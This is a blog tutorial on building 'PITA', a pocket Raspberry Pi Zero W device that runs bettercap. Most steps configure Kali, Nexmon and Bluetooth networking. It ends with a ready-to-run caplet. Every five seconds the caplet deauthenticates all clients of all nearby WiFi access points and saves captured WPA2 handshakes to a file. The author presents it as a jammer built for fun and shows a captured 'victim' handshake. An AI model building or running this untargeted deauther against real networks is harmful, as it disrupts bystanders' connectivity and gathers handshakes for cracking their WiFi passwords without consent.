Project PITA: Build a Mini Mass Deauther Using Bettercap and a Raspberry Pi Zero W


A few days ago I started playing with some idea I had from a few weeks already, using a Raspberry Pi Zero W to make a mini WiFi deauthenticator: something in my pocket that periodically jumps on all the channels in the WiFi spectrum, collects information about the nearby access points and their connected clients and then sends a deauthentication packet to each one of them, resulting in some sort of WiFi jammer on the 802.11 level. As an interesting “side effect” of this jammer (the initial intent was purely for the lulz) is that the more it deauths, the higher the changes to also sniff WPA2 handshakes.

Thanks to the awesome work of the Kali and Nexmon communities in packaging the nexmon drivers and utilities and to the recent changes we released in bettercap, this was very easy to setup and to script and given the interest the tweet had I thought to share this writeup :)

deauth

This awesome case has been designed by @elkentaro and can be found on his Thingverse page.

[0x00] FAQ

Why not using Nethunter or some other Kali image for Android and a smartphone instead?

Monitor mode works, injection doesn’t. Using an external WiFi makes the whole thing bigger and kills the battery.

Why not using … instead?

There are many alternatives to the setup I’m going to describe, it’s not necessarily the best, just the one that works for me.

Why …?

BECAUSE. The point of this post is not just the hardware, but mostly how to use bettercap to attack wifi.

[0x01] Kali image and initial headless configuration.

First thing first, you’ll need to download the Kali Linux Rpi0w Nexmon image from this page and burn it to the uSD card you’re going to use for the rpi using the usual dd method, but before unmounting it, we need to enable SSH at boot and configure it to connect to our home WiFi network for the initial configuration, keep in mind this is just temporary and the main wifi interface will be used for packet injection later, while we will be able to connect via bluetooth to the board.

From the computer you used to burn the image on your micro sd, mount it again if needed and then:

1
2
3
4
# this will enable ssh at boot
touch /sd-mount-point/boot/ssh
# let's setup wlan0
nano /sd-mount-point/etc/network/interfaces

Fill this file with the following contents:

1
2
3
4
5
6
7
8
auto lo
iface lo inet loopback
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

Now we’ll add the details of the WiFi network we want the rpi to connect automatically for configuration:

1
nano /sd-mount-point/etc/wpa_supplicant/wpa_supplicant.conf

And add this:

1
2
3
4
5
6
7
8
9
country=GB
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
network={
ssid="YourWiFiName"
psk="y0urw1f!p455w0rd"
key_mgmt=WPA-PSK
}

Reboot the RPI and it should connect to your WiFi, search for its IP address (either by broadcast ping, or using bettercap itself, i usually use the netmon caplet to see what’s going on on my network) and finally SSH to it using the default Kali credentials:

1
2
3
# this will allow you to login with your SSH key instead of a password
ssh-copy-id -i ~/.ssh/id_rsa.pub [email protected]

Once you’re logged in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# always change the default root password
passwd
# regenerate ssh keys
ssh-keygen
# set a nicer hostname :D
hostname -b pita
echo pita > /etc/hostname
echo "127.0.0.1 pita" >> /etc/hosts
# update the system
apt update
apt upgrade
# install a few useful packages and setup swap
apt install git dphys-swapfile
# set CONF_SWAPSIZE to 1024
nano /etc/dphys-swapfile
systemctl enable dphys-swapfile
# set the correct timezone
dpkg-reconfigure tzdata
# reboot to apply the effects
reboot

[0x02] Connecting via Bluetooth with bt-nap

We want to use wlan0 for the monitor mode and injection using Nexmon, meaning we need another way to connect to our board. For this, we can setup the rpi to work as a bt-nap server, basically you will be able to connect via bluetooth and reach it with an IP address on that bluetooth connection, this works both from a laptop and from a smartphone as well.




Let’s connect once more via WiFi and SSH:

1
2
3
4
5
6
7
# install a few dependencies
apt install pulseaudio pulseaudio-module-zeroconf alsa-utils avahi-daemon pulseaudio-module-bluetooth
git clone https://github.com/bablokb/pi-btnap.git
# install btnap as a server
./pi-btnap/tools/install-btnap server

Fix the bluetooth configuration file /etc/systemd/system/bluetooth.target.wants/bluetooth.service by disabling the SAP plugin that would break bluetooth, change the ExecStart part with:

1
ExecStart=/usr/lib/bluetooth/bluetoothd --noplugin=sap

Let’s set the bluetooth name of your device by editing /etc/bluetooth/main.conf and finally edit the btnap configuration file itself, /etc/btnap.conf:

1
2
3
4
5
6
7
MODE="server"
BR_DEV="br0"
BR_IP="192.168.20.99/24"
BR_GW="192.168.20.1"
ADD_IF="lo"
REMOTE_DEV=""
DEBUG=""

Enable all the services at boot and restart them:

1
2
3
4
5
6
7
systemctl enable bluetooth
systemctl enable btnap
systemctl enable dnsmasq
service bluetooth restart
service dnsmasq restart
service btnap restart

Before being able to connect via bluetooth, we need to manually pair and trust the device we’re going to use (remember to repeat this step for every new device you want to allow to connect to the PITA board), make sure your control device (your laptop for instance) has bluetooth enabled and it’s visible, then from the pita:

1
2
3
4
5
6
7
8
9
10
11
bluetoothctl
> agent on
> scan on
... wait for your device to show up ...
...
... now pair with its address
> pair aa:bb:cc:dd:ee:ff
... and trust it permantently ...
> trust aa:bb:cc:dd:ee:ff
... wait ...
> quit

We’re now ready to “free” the wlan0 interface and use it for more cool stuff, let’s change the file /etc/network/interfaces to:

1
2
3
4
5
auto lo
iface lo inet loopback
allow-hotplug wlan0
iface wlan0 inet static

From the board now, disable wpa_supplicant and reboot:

1
2
service wpa_supplicant disable
reboot

After reboot, you’ll be able to connect to the board via bluetooth.

bt

Your system (this depends on the system you’re using, on most GNU/Linux distributions and Android this is basically automatically detected) should now have a new DHCP based Pita Network entry in the network manager:

pita network

Once connected, you should see a new bnep0 network interface:

ifconfig

You can finally ssh to your PITA board via bluetooth now :)

1
2
echo "192.168.20.99 pita" >> /etc/hosts

[0x03] Having fun with wlan0 and bettercap

IMPORTANT

In order to install bettercap and download the caplet, you will need internet connectivity on the rpi, but we just freed wlan0 for injection, so you’ll either have to plug some ethernet adapter, smartphone in tethering mode, etc on the mini usb port now, or perform these steps while the board is still connected to your WiFi during section 0x01.

Now that we can power our board either from a powerbank or the smartphone itself and we can connect to it via SSH over bluetooth, the next step is to install bettercap itself, we will compile it directly on the PITA, it’ll take a while but it’s very easy:

1
2
3
4
5
6
7
8
9
10
11
12
13
apt install golang libpcap-dev libnetfilter-queue-dev wget build-essential
# you should make this persistent in your .bashrc or .zshrc file
export GOPATH=/root/gocode
mkdir -p $GOPATH
go get github.com/bettercap/bettercap
# wait
# let's install it for everyone to enjoy ^_^
cd /root/gocode/src/github.com/bettercap/bettercap
make
make install
# let's download the pita.cap caplet
cd /usr/share/bettercap/caplets/
wget "https://raw.githubusercontent.com/bettercap/caplets/master/pita.cap"

The pita.cap caplet will take care of starting wlan0 in monitor mode, periodically send deauth packets and also sniffing for WPA2 handshakes as they arrive, you can launch it and keep it persistent with something like screen or tmux. It is a basic example of what you can do now, many other functionalities can be found in the caplets repo and generally in the project wiki:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
set $ {bold}😈 » {reset}
# make sure wlan0 is in monitor mode
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
!monstop
!monstart
# every 5 seconds:
# - clear the screen
# - show the list of nearby access points
# - deauth every client from each one of them
set ticker.period 5
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3
wifi.recon on
ticker on
net.sniff on
# we'll see lots of probes after each deauth, just skip the noise ...
events.ignore wifi.client.probe
# start fresh
events.clear
clear

To start bettercap with this caplet:

1
2
3
ifconfig wlan0 up
bettercap -iface wlan0 -caplet /usr/share/bettercap/caplets/pita.cap
# enjoy ^_^

Just after a few minutes my prototype was able to deauth and capture the handshake of some device:

victim

I hope I did not forget about any step, the btnep part specifically was a little bit tricky to setup, let me know in the comments if something doesn’t work for you and I’ll try to help and fix this writeup, as usual, enjoy!